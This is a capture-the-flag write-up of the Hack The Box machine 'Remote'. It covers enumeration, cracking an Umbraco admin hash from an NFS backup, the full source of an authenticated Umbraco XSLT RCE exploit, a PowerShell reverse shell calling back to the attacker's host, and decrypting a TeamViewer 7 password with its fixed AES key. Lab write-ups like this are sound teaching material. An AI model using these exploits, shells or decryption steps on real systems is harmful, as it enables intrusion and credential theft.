--- search: exclude: true --- # Remote Writeup ![](img/44.png) ## Introduction : Remote is an easy Windows box released back in march 2020 ## **Part 1 : Initial Enumeration** As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions. [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote] → nmap -vvv -p- 10.10.10.180 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered Discovered open port 80/tcp on 10.10.10.180 Discovered open port 111/tcp on 10.10.10.180 Discovered open port 135/tcp on 10.10.10.180 Discovered open port 139/tcp on 10.10.10.180 Discovered open port 445/tcp on 10.10.10.180 Discovered open port 21/tcp on 10.10.10.180 Discovered open port 49666/tcp on 10.10.10.180 Discovered open port 49678/tcp on 10.10.10.180 Discovered open port 5985/tcp on 10.10.10.180 Discovered open port 47001/tcp on 10.10.10.180 Discovered open port 49667/tcp on 10.10.10.180 Discovered open port 49665/tcp on 10.10.10.180 Discovered open port 2049/tcp on 10.10.10.180 Discovered open port 49664/tcp on 10.10.10.180 [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote] → nmap -sCV 10.10.10.180 -p 21,80,111,135,445,2049 Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-30 18:12 CEST Nmap scan report for 10.10.10.180 Host is up (0.043s latency). PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: |_ SYST: Windows_NT 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Home - Acme Widgets 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/tcp6 rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 2,3,4 111/udp6 rpcbind | 100003 2,3 2049/udp nfs | 100003 2,3 2049/udp6 nfs | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/tcp6 nfs | 100005 1,2,3 2049/tcp mountd | 100005 1,2,3 2049/tcp6 mountd | 100005 1,2,3 2049/udp mountd | 100005 1,2,3 2049/udp6 mountd | 100021 1,2,3,4 2049/tcp nlockmgr | 100021 1,2,3,4 2049/tcp6 nlockmgr | 100021 1,2,3,4 2049/udp nlockmgr | 100021 1,2,3,4 2049/udp6 nlockmgr | 100024 1 2049/tcp status | 100024 1 2049/tcp6 status | 100024 1 2049/udp status |_ 100024 1 2049/udp6 status 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds? 2049/tcp open mountd 1-3 (RPC #100005) Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 7m35s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-05-30T16:21:22 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 83.57 seconds ## **Part 2 : Getting User Access** Our nmap scan picked up port 21 FTP with anonymous login allowed, We can recursively get what's there with wget : [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote] → wget -r ftp://anonymous:anonymous@10.10.10.180/ However there are no files to get so we're going to continue exploring port 80 instead: ![](prg/44_001.png) [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote] → gobuster dir -u http://10.10.10.180 -w /usr/share/seclists/Discovery/Web-Content/common.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.180 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2021/05/30 18:42:03 Starting gobuster in directory enumeration mode =============================================================== /Blog (Status: 200) [Size: 5001] /Contact (Status: 200) [Size: 7880] /Home (Status: 200) [Size: 6703] /People (Status: 200) [Size: 6749] /Products (Status: 200) [Size: 5338] /about-us (Status: 200) [Size: 5451] /blog (Status: 200) [Size: 5011] /contact (Status: 200) [Size: 7890] /home (Status: 200) [Size: 6703] /install (Status: 302) [Size: 126] [--> /umbraco/] /intranet (Status: 200) [Size: 3323] /master (Status: 500) [Size: 3420] /people (Status: 200) [Size: 6739] /person (Status: 200) [Size: 2741] /product (Status: 500) [Size: 3420] /products (Status: 200) [Size: 5328] /render/https://www.google.com (Status: 400) [Size: 3420] /umbraco (Status: 200) [Size: 4040] =============================================================== 2021/05/30 18:43:05 Finished =============================================================== Here we see that gobuster picked up the /umbraco/ directory: ![](prg/44_002.png) Although we don't have credentials to get in yet. Our nmap scan picked up some available NFS shares on port 111, so let's enumerate those using the **showmount** utility: [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote] → apt search showmount Sorting... Done Full Text Search... Done nfs-common/kali-rolling,now 1:1.3.4-5 amd64 [installed,automatic] NFS support files common to client and server [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote] → sudo apt install nfs-common -y [sudo] password for nothing: Reading package lists... Done Building dependency tree... Done Reading state information... Done nfs-common is already the newest version (1:1.3.4-5). nfs-common set to manually installed. 0 upgraded, 0 newly installed, 0 to remove and 1 not upgraded. [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote] → showmount -e 10.10.10.180 Export list for 10.10.10.180: /site_backups (everyone) Here we see a mountable folder called site_backups, so let's mount it: [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote] → mkdir backups [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote] → sudo mount -t nfs 10.10.10.180:/site_backups backups/ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote] → ls -lash backups total 123K 4.0K drwx------ 2 nobody 4294967294 4.0K Feb 23 2020 . 4.0K drwxr-xr-x 4 nothing nothing 4.0K May 30 19:40 .. 512 drwx------ 2 nobody 4294967294 64 Feb 20 2020 App_Browsers 4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 App_Data 4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 App_Plugins 512 drwx------ 2 nobody 4294967294 64 Feb 20 2020 aspnet_client 48K drwx------ 2 nobody 4294967294 48K Feb 20 2020 bin 8.0K drwx------ 2 nobody 4294967294 8.0K Feb 20 2020 Config 512 drwx------ 2 nobody 4294967294 64 Feb 20 2020 css 512 -rwx------ 1 nobody 4294967294 152 Nov 1 2018 default.aspx 512 -rwx------ 1 nobody 4294967294 89 Nov 1 2018 Global.asax 4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 Media 512 drwx------ 2 nobody 4294967294 64 Feb 20 2020 scripts 8.0K drwx------ 2 nobody 4294967294 8.0K Feb 20 2020 Umbraco 4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 Umbraco_Client 4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 Views 28K -rwx------ 1 nobody 4294967294 28K Feb 20 2020 Web.config Now here in the files we see that there are some Umbraco directories, and after searching a bit online, we see that there can be a server database in the **/App_Data** folder named **Umbraco.sdf** [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote] → strings backups/App_Data/Umbraco.sdf| grep Administrator Administratoradmindefaulten-US Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d adminAdministratorsCADMOSKTPIURZ:5F7 Here we see that the Administrator user has a hashed password with the SHA1 algorithm, so let's attempt to crack it using john: [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote] → cat hash.txt b8be16afba8c314ad33d812f22a04991b90e2aaa [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote] → john hash.txt --format=Raw-SHA1 -w=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x]) Warning: no OpenMP support for this hash type, consider --fork=4 Press 'q' or Ctrl-C to abort, almost any other key for status baconandcheese (?) 1g 0:00:00:00 DONE (2021-05-30 19:47) 1.282g/s 12594Kp/s 12594Kc/s 12594KC/s baconandchipies1..bacon918 Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably Session completed And we found the Administrator password for Umbraco: **baconandcheese** , so let's login: ![](prg/44_003.png) Clicking help at the bottom left corner, we can see the version of this Umbraco instance: ![](prg/44_004.png) And so we can look for CVEs for that Umbraco version: [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote] → searchsploit umbraco ------------------------------------------------------- --------------------------------- Exploit Title | Path ------------------------------------------------------- --------------------------------- Umbraco CMS - Remote Command Execution (Metasploit) | windows/webapps/19671.rb **Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execu | aspx/webapps/46153.py** Umbraco CMS 7.12.4 - Remote Code Execution (Authentica | aspx/webapps/49488.py Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scrip | php/webapps/44988.txt ------------------------------------------------------- --------------------------------- Shellcodes: No Results And we get a few exploits to use for our Umbraco instance! Let's try the first RCE exploit: [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote] → cp $(locate 46153.py) . [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote] → cat 46153.py # Exploit Title: Umbraco CMS - Remote Code Execution by authenticated administrators # Dork: N/A # Date: 2019-01-13 # Exploit Author: Gregory DRAPERI & Hugo BOUTINON # Vendor Homepage: http://www.umbraco.com/ # Software Link: https://our.umbraco.com/download/releases # Version: 7.12.4 # Category: Webapps # Tested on: Windows IIS # CVE: N/A import requests; from bs4 import BeautifulSoup; def print_dict(dico): print(dico.items()); print("Start"); # Execute a calc for the PoC payload = '<****?xml version="1.0"?> <****xsl:stylesheet version="1.0" \ xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \ xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\ <****msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \ { string**cmd = "wget 10.10.14.13/your_rce_attempt_worked!";** System.Diagnostics.Process proc = new System.Diagnostics.Process();\ proc.StartInfo.FileName = **"powershell.exe";** proc.StartInfo.Arguments = cmd;\ proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \ proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \ <****/msxsl:script> <****xsl:template match="/"> <****xsl:value-of select="csharp_user:xml()"/>\ <****/xsl:template> <****/xsl:stylesheet> ';**login = "admin@htb.local"; password="baconandcheese"; host = "http://10.10.10.180";** # Step 1 - Get Main page s = requests.session() url_main =host+"/umbraco/"; r1 = s.get(url_main); print_dict(r1.cookies); # Step 2 - Process Login url_login = host+"/umbraco/backoffice/UmbracoApi/Authentication/PostLogin"; loginfo = {"username":login,"password":password}; r2 = s.post(url_login,json=loginfo); # Step 3 - Go to vulnerable web page url_xslt = host+"/umbraco/developer/Xslt/xsltVisualize.aspx"; r3 = s.get(url_xslt); soup = BeautifulSoup(r3.text, 'html.parser'); VIEWSTATE = soup.find(id="__VIEWSTATE")['value']; VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value']; UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN']; headers = {'UMB-XSRF-TOKEN':UMBXSRFTOKEN}; data = {"__EVENTTARGET":"","__EVENTARGUMENT":"","__VIEWSTATE":VIEWSTATE,"__VIEWSTATEGENERATOR":VIEWSTATEGENERATOR,"ctl00$body$xsltSelection":payload,"ctl00$body$contentPicker$ContentIdValue":"","ctl00$body$visualizeDo":"Visualize+XSLT"}; # Step 4 - Launch the attack r4 = s.post(url_xslt,data=data,headers=headers); print("End");% Make sure you edit the values of login, password, host, powershell.exe and wget tun0/rcetest that i highlighted above, then proceed: [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote] → python3 46153.py Start [] End [ 10.10.14.13/23 ] [ /dev/pts/44 ] [~/HTB/Remote] → sudo python3 -m http.server 80 [sudo] password for nothing: Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.180 - - [31/May/2021 06:48:29] code 404, message File not found 10.10.10.180 - - [31/May/2021 06:48:29] "GET /your_rce_attempt_worked! HTTP/1.1" 404 - And now after testing it we see that we have been able to get the machine to execute the wget command back to us, however [noraj](https://pwn.by/noraj/index.md) made a much better rewrite of this Umbraco RCE python exploit which allows us to pass arguements: [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote] → wget https://raw.githubusercontent.com/noraj/Umbraco-RCE/master/exploit.py --2021-05-31 07:07:53-- https://raw.githubusercontent.com/noraj/Umbraco-RCE/master/exploit.py Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.110.133, ... Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 3202 (3.1K) [text/plain] Saving to: ‘exploit.py’ exploit.py 100%[======================================================================================================================================================>] 3.13K --.-KB/s in 0s 2021-05-31 07:07:53 (6.52 MB/s) - ‘exploit.py’ saved [3202/3202] [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote] → python3 exploit.py -h usage: exploit.py [-h] -u USER -p PASS -i URL -c CMD [-a ARGS] Umbraco authenticated RCE optional arguments: -h, --help show this help message and exit -u USER, --user USER username / email -p PASS, --password PASS password -i URL, --host URL root URL -c CMD, --command CMD command -a ARGS, --arguments ARGS arguments So let's use it: [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote] → python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command whoami' iis apppool\defaultapppool We see that we can get remote code execution as the apppool user, [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote] → python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command systeminfo' Host Name: REMOTE OS Name: Microsoft Windows Server 2019 Standard OS Version: 10.0.17763 N/A Build 17763 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00429-00521-62775-AA801 Original Install Date: 2/19/2020, 4:03:29 PM System Boot Time: 5/30/2021, 12:07:27 PM System Manufacturer: VMware, Inc. System Model: VMware7,1 System Type: x64-based PC Processor(s): 4 Processor(s) Installed. [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz [03]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz [04]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz BIOS Version: VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-05:00) Eastern Time (US & Canada) Total Physical Memory: 4,095 MB Available Physical Memory: 2,745 MB Virtual Memory: Max Size: 4,799 MB Virtual Memory: Available: 3,426 MB Virtual Memory: In Use: 1,373 MB Page File Location(s): C:\pagefile.sys Domain: WORKGROUP Logon Server: N/A **Hotfix(s): 5 Hotfix(s) Installed. [01]: KB4534119 [02]: KB4462930 [03]: KB4516115 [04]: KB4523204 [05]: KB4464455** Network Card(s): 1 NIC(s) Installed. [01]: vmxnet3 Ethernet Adapter Connection Name: Ethernet0 2 DHCP Enabled: No IP address(es) [01]: 10.10.10.180 [02]: fe80::108b:625:aa40:7e42 [03]: dead:beef::108b:625:aa40:7e42 Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed. And we also are able to print out the infos about the server itself, including the current hotfixes. However we first need to get a reverse shell onto the box, let's find where the ftp folder is: [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote] → python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command ls c:/' Directory: C:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- **d----- 2/20/2020 1:13 AM ftp_transfer** d----- 2/19/2020 3:11 PM inetpub d----- 2/19/2020 11:09 PM Microsoft d----- 9/15/2018 3:19 AM PerfLogs d-r--- 2/23/2020 2:19 PM Program Files d----- 2/23/2020 2:19 PM Program Files (x86) **d----- 5/30/2021 11:07 AM site_backups** d-r--- 2/19/2020 3:12 PM Users d----- 2/20/2020 12:52 AM Windows [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote] → python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command ls c:/ftp_transfer' [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote] → python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command new-item c:/ftp_transfer/test.txt' Directory: C:\ftp_transfer Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 5/31/2021 1:45 AM 0 test.txt And as you can see, we are able to write to the **C:\ftp_transfer** directory so let's make use of it by first locally creating our powershell script containing our reverse shell payload: [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote] → vim shell.ps1 [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote] → cat shell.ps1 $client = New-Object System.Net.Sockets.TCPClient(**"10.10.14.13",9001**);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() This will send a reverse shell connection back to our **tun0** interface on port **9001** once we get the box to execute it. In order to do that, we can get this script into the ftp_transfer directory we found earlier: [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote] → python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command curl http://10.10.14.13:9090/shell.ps1 -o c:/ftp_transfer/shell.ps1' [ 10.10.14.13/23 ] [ /dev/pts/44 ] [~/HTB/Remote] → ls -lash shell.ps1 4.0K -rw-r--r-- 1 nothing nothing 482 May 31 07:50 shell.ps1 [ 10.10.14.13/23 ] [ /dev/pts/44 ] [~/HTB/Remote] → python3 -m http.server 9090 Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ... 10.10.10.180 - - [31/May/2021 07:53:26] "GET /shell.ps1 HTTP/1.1" 200 - Now that our shell.ps1 got uploaded, let's execute it: [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote] → python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command c:/ftp_transfer/shell.ps1' [ 10.10.14.13/23 ] [ /dev/pts/44 ] [~/HTB/Remote] → nc -lvnp 9001 listening on [any] 9001 ... connect to [10.10.14.13] from (UNKNOWN) [10.10.10.180] 49854 whoami iis apppool\defaultapppool And we got a reverse shell connection! # cd c:\users\public # ls Directory: C:\users\public Mode LastWriteTime Length Name ---- ------------- ------ ---- d-r--- 2/19/2020 3:03 PM Documents d-r--- 9/15/2018 3:19 AM Downloads d-r--- 9/15/2018 3:19 AM Music d-r--- 9/15/2018 3:19 AM Pictures d-r--- 9/15/2018 3:19 AM Videos -ar--- 5/30/2021 12:08 PM 34 user.txt # cat user.txt 67XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX And we managed to get the user flag! ## **Part 3 : Getting Root Access** Now in order to privesc to the Administrator user on this box, we're going to run winpeas on the box: [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Remote] → cp $(locate winPEAS.ps1) . [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Remote] → ls -lash Invoke-winPEAS.ps1 228K -rw-r--r-- 1 nothing nothing 228K May 31 09:00 Invoke-winPEAS.ps1 [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Remote] → python3 -m http.server 9090 Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ... # cd C:\ftp_transfer # curl http://10.10.14.13:9090/Invoke-winPEAS.ps1 -o peas.ps1 # import-module ./peas.ps1 # Invoke-winPEAS So here we basically got our winpeas powershell module onto the box, then we imported it which gave us the Invoke-winPEAS command to execute: ![](prg/44_005.png) Immediately winPEAS found 9 potential CVEs on the box: ![](prg/44_006.png) However one of the intended privesc paths to follow was the TeamViewer v7 application that's installed on the box: ![](prg/44_007.png) # cd 'C:\Program Files (x86)\TeamViewer\' # ls Directory: C:\Program Files (x86)\TeamViewer Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 5/31/2021 12:54 AM Version7 We're going to take advantage of this teamviewer version 7 software to privesc to the Administrator user like how it was described in this [blogpost](https://whynotsecurity.com/blog/teamviewer/): First of all, TeamViewer7 stores the password in the registry under the value **SecurityPasswordAES** and this password is encrypted with **AES-128-CBC** , with the key set as **0602000000a400005253413100040000** and the Initialization Vector set as **0100010067244F436E6762F25EA8D704** , Looking up google a bit, we [find](https://community.teamviewer.com/English/kb/articles/16835-how-to-uninstall-teamviewer-on-pc) that the registry key for TeamViewer is under **HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer** : # reg query HKLM\SOFTWARE\Wow6432Node\TeamViewer HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7 # reg query HKLM\SOFTWARE\Wow6432Node\TeamViewer\Version7 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7 StartMenuGroup REG_SZ TeamViewer 7 InstallationDate REG_SZ 2020-02-20 InstallationDirectory REG_SZ C:\Program Files (x86)\TeamViewer\Version7 Always_Online REG_DWORD 0x1 Security_ActivateDirectIn REG_DWORD 0x0 Version REG_SZ 7.0.43148 ClientIC REG_DWORD 0x11f25831 PK REG_BINARY BFAD2AEDB6C89AE0A0FD0501A0C5B9A5C0D957A4CC57C1884C84B6873EA03C069CF06195829821E28DFC2AAD372665339488DD1A8C85CDA8B19D0A5A2958D86476D82CA0F2128395673BA5A39F2B875B060D4D52BE75DB2B6C91EDB28E90DF7F2F3FBE6D95A07488AE934CC01DB8311176AEC7AC367AB4332ABD048DBFC2EF5E9ECC1333FC5F5B9E2A13D4F22E90EE509E5D7AF4935B8538BE4A606AB06FE8CC657930A24A71D1E30AE2188E0E0214C8F58CD2D5B43A52549F0730376DD3AE1DB66D1E0EBB0CF1CB0AA7F133148D1B5459C95A24DDEE43A76623759017F21A1BC8AFCD1F56FD0CABB340C9B99EE3828577371B7ADA9A8F967A32ADF6CF062B00026C66F8061D5CFF89A53EAE510620BC822BC6CC615D4DE093BC0CA8F5785131B75010EE5F9B6C228E650CA89697D07E51DBA40BF6FC3B2F2E30BF6F1C01F1BC2386FA226FFFA2BE25AE33FA16A2699A1124D9133F18B50F4DB6EDA2D23C2B949D6D2995229BC03507A62FCDAD55741B29084BD9B176CFAEDAAA9D48CBAF2C192A0875EC748478E51156CCDD143152125AE7D05177083F406703ED44DCACCD48400DD88A568520930BED69FCD672B15CD3646F8621BBC35391EAADBEDD04758EE8FC887BACE6D8B59F61A5783D884DBE362E2AC6EAC0671B6B5116345043257C537D27A8346530F8B7F5E0EBACE9B840E716197D4A0C3D68CFD2126E8245B01E62B4CE597AA3E2074C8AB1A4583B04DBB13F13EB54E64B850742A8E3E8C2FAC0B9B0CF28D71DD41F67C773A19D7B1A2D0A257A4D42FC6214AB870710D5E841CBAFCD05EF13B372F36BF7601F55D98ED054ED0F321AEBA5F91D390FF0E8E5815E6272BA4ABB3C85CF4A8B07851903F73317C0BC77FA12A194BB75999319222516 SK REG_BINARY F82398387864348BAD0DBB41812782B1C0ABB9DAEEF15BC5C3609B2C5652BED7A9A07EA41B3E7CB583A107D39AFFF5E06DF1A06649C07DF4F65BD89DE84289D0F2CBF6B8E92E7B2901782BE8A039F2903552C98437E47E16F75F99C07750AEED8CFC7CD859AE94EC6233B662526D977FFB95DD5EB32D88A4B8B90EC1F8D118A7C6D28F6B5691EB4F9F6E07B6FE306292377ACE83B14BF815C186B7B74FFF9469CA712C13F221460AC6F3A7C5A89FD7C79FF306CEEBEF6DE06D6301D5FD9AB797D08862B9B7D75B38FB34EF82C77C8ADC378B65D9ED77B42C1F4CB1B11E7E7FB2D78180F40C96C1328970DA0E90CDEF3D4B79E08430E546228C000996D846A8489F61FE07B9A71E7FB3C3F811BB68FDDF829A7C0535BA130F04D9C7C09B621F4F48CD85EA97EF3D79A88257D0283BF2B78C5B3D4BBA4307D2F38D3A4D56A2706EDAB80A7CE20E21099E27481C847B49F8E91E53F83356323DDB09E97F45C6D103CF04693106F63AD8A58C004FC69EF8C506C553149D038191781E539A9E4E830579BCB4AD551385D1C9E4126569DD96AE6F97A81420919EE15CF125C1216C71A2263D1BE468E4B07418DE874F9E801DA2054AD64BE1947BE9580D7F0E3C138EE554A9749C4D0B3725904A95AEBD9DACCB6E0C568BFA25EE5649C31551F268B1F2EC039173B7912D6D58AA47D01D9E1B95E3427836A14F71F26E350B908889A95120195CC4FD68E7140AA8BB20E211D15C0963110878AAB530590EE68BF68B42D8EEEB2AE3B8DEC0558032CFE22D692FF5937E1A02C1250D507BDE0F51A546FE98FCED1E7F9DBA3281F1A298D66359C7571D29B24D1456C8074BA570D4D0BA2C3696A8A9547125FFD10FBF662E597A014E0772948F6C5F9F7D0179656EAC2F0C7F LastMACUsed REG_MULTI_SZ \0005056B9A169 MIDInitiativeGUID REG_SZ {514ed376-a4ee-4507-a28b-484604ed0ba0} MIDVersion REG_DWORD 0x1 ClientID REG_DWORD 0x6972e4aa CUse REG_DWORD 0x1 LastUpdateCheck REG_DWORD 0x5e72893c UsageEnvironmentBackup REG_DWORD 0x1 **SecurityPasswordAES REG_BINARY FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B** MultiPwdMgmtIDs REG_MULTI_SZ admin MultiPwdMgmtPWDs REG_MULTI_SZ 357BC4C8F33160682B01AE2D1C987C3FE2BAE09455B94A1919C4CD4984593A77 Security_PasswordStrength REG_DWORD 0x3 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7\AccessControl HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7\DefaultSettings We already see it but let's filter to just get the part we want: # reg query HKLM\SOFTWARE\Wow6432Node\TeamViewer\Version7 /v SecurityPasswordAES HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7 **SecurityPasswordAES REG_BINARY FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B** now that we got it, we can use the python script of the aforementionned blog post in order to decrypt the password: import sys, hexdump, binascii from Crypto.Cipher import AES class AESCipher: def __init__(self, key): self.key = key def decrypt(self, iv, data): self.cipher = AES.new(self.key, AES.MODE_CBC, iv) return self.cipher.decrypt(data) key = binascii.unhexlify("0602000000a400005253413100040000") iv = binascii.unhexlify("0100010067244F436E6762F25EA8D704") **hex_str_cipher = "FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B"** ciphertext = binascii.unhexlify(hex_str_cipher) raw_un = AESCipher(key).decrypt(iv, ciphertext) print(hexdump.hexdump(raw_un)) password = raw_un.decode('utf-16') print(password) [ 10.10.14.13/23 ] [ /dev/pts/49 ] [~/HTB/Remote] → pip3 install pycryptodome hexdump Requirement already satisfied: pycryptodome in /home/nothing/.local/lib/python3.9/site-packages (3.10.1) Requirement already satisfied: hexdump in /home/nothing/.local/lib/python3.9/site-packages (3.3) [ 10.10.14.13/23 ] [ /dev/pts/49 ] [~/HTB/Remote] → python3 decrypt.py 00000000: 21 00 52 00 33 00 6D 00 30 00 74 00 65 00 21 00 !.R.3.m.0.t.e.!. 00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ None !R3m0te! And we found the password! Now let's use it with evilWinRM: [ 10.10.14.13/23 ] [ /dev/pts/49 ] [~/HTB/Remote] → evil-winrm -u administrator -p '!R3m0te!' -i 10.10.10.180 Evil-WinRM shell v2.4 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami remote\administrator *Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt 6aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX And that's it! We managed to get the root flag. ## **Conclusion** Here we can see the progress graph : ![](img/44_graph.png)